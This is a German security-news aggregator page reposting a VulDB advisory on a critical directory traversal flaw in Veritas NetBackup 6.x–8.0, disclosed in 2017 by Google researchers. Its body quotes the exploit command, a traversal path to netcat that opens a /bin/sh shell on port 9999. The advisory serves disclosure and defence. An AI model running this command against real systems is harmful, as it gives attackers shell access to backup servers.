💾 DownloadsGitHub Release: ollama/ollama v0.34.2-rc3 (17.09.2026)(17.09.2026 um 20:49 Uhr)
💾 DownloadsGitHub Release: anomalyco/opencode v2.0.7 (17.09.2026)(17.09.2026 um 21:29 Uhr)
🔧 AI Nachrichten OpenAI: ChatGPT for Word is now available(17.09.2026 um 21:12 Uhr)
🍏 iOS / Mac OSSiri AI Hits and Misses(17.09.2026 um 21:02 Uhr)
🔧 ProgrammierungWhy client SDK generation belongs in the open(17.09.2026 um 21:18 Uhr)
💾 DownloadsGitHub Release: ollama/ollama v0.34.2-rc3 (17.09.2026)(17.09.2026 um 20:49 Uhr)
💾 DownloadsGitHub Release: anomalyco/opencode v2.0.7 (17.09.2026)(17.09.2026 um 21:29 Uhr)
🔧 AI Nachrichten OpenAI: ChatGPT for Word is now available(17.09.2026 um 21:12 Uhr)
🍏 iOS / Mac OSSiri AI Hits and Misses(17.09.2026 um 21:02 Uhr)
🔧 ProgrammierungWhy client SDK generation belongs in the open(17.09.2026 um 21:18 Uhr)
🕵️ Sicherheitslücken 🕛 vor 9 Jahren 3 Min Lesezeit
0

Veritas NetBackup 6.x/7.x/8.0 Whitelist Directory Traversal

↗ Quelle (vuldb.com)
🗣️ Stimme:
📑 Inhaltsübersicht

Eine Schwachstelle wurde in Veritas NetBackup 6.x/7.x/8.0 gefunden. Sie wurde als kritisch eingestuft. Betroffen davon ist eine unbekannte Funktion der Komponente Whitelist. Durch Manipulieren mit einer unbekannten Eingabe kann eine Directory Traversal-Schwachstelle ausgenutzt werden. Auswirkungen sind zu beobachten für Vertraulichkeit, Integrität und Verfügbarkeit.

Die Schwachstelle wurde am 01.03.2017 durch Sven Blumenstein, Xiaoran Wang und Andrew Griffiths von Google als Veritas NetBackup v6.x, v7.x, v8.0 and NetBackup appliances v2.x, v3.0 - Multiple Critical Vulnerabilities in Form eines unbestätigten Mailinglist Posts (Full-Disclosure) veröffentlicht. Auf zur Verfügung gestellt. Der durch den Exploit genutzte Code gestaltet sich wie folgt:

/usr/openv/netbackup/bin/../../../../../../../usr/bin/nc foo -lp 9999 -e/bin/sh

Es sind keine Informationen bezüglich Gegenmassnahmen bekannt. Der Einsatz eines alternativen Produkts bietet sich im Zweifelsfall an.

Die Einträge , sind sehr ähnlich.

Betroffen

  • Veritas NetBackup Appliance 6.x/7.x/8.0
  • Veritas NetBackup Appliances 2.x/3.0

CVSSv3

VulDB Base Score:
VulDB Vector:
VulDB Temp Score:
  • Exploiting

    Klasse: Directory Traversal (

    Preisentwicklung: gleichbleibend
    Aktuelle Preisschätzung: $0-$5k (0-day) / $0-$5k (Heute)

    Gegenmassnahmen

    Empfehlung: keine Massnahme bekannt
    Status: Nicht verfügbar
    0-Day Time: 0 Tage seit gefunden
    Exploit Delay Time: 0 Tage seit bekannt

    Timeline

    01.03.2017
    01.03.2017

    Quellen

    Advisory: , , ,

    Eintrag

    Erstellt: 01.03.2017
    Eintrag: 76.4% komplett
    Vollständiger Original-Artikel
    Den kompletten Beitrag mit allen Details direkt auf vuldb.com lesen.
    ↗ Original-Artikel auf vuldb.com lesen
    Wie bewertest du diesen Beitrag?
    1 Klick Feedback
    Teilen mit Netzwerk & Team:

    Community-Analysen & Experten-Meinungen 0

    Verfasse deine eigene Analyse, teile Workarounds oder diskutiere diesen Vorfall im Blog.
    Noch keine Community-Analyse verfasst. Markiere einen Textabschnitt oder klicke oben auf Eigene Analyse verfassen“!
    Community Pulse: Relevanz-Einschätzung
    1 Klick Experten-Votum
    🔴 Akute Relevanz 0%
    🟡 In Evaluierung 0%
    🟢 Keine Auswirkung 0%
    Spannende Innovation 0%
    Verwandte Story-Cluster & Quellen (Vektor-KI)
    Port 8095 Engine
    1 Quelle
    China's FamousSparrow APT Spies on US Politics in Latin America
    1 Quelle
    Researchers find way to listen in on headphones from afar
    1 Quelle
    Roku rolls out over 30 subscription bundles for up to 30% off, plus a new Labs feature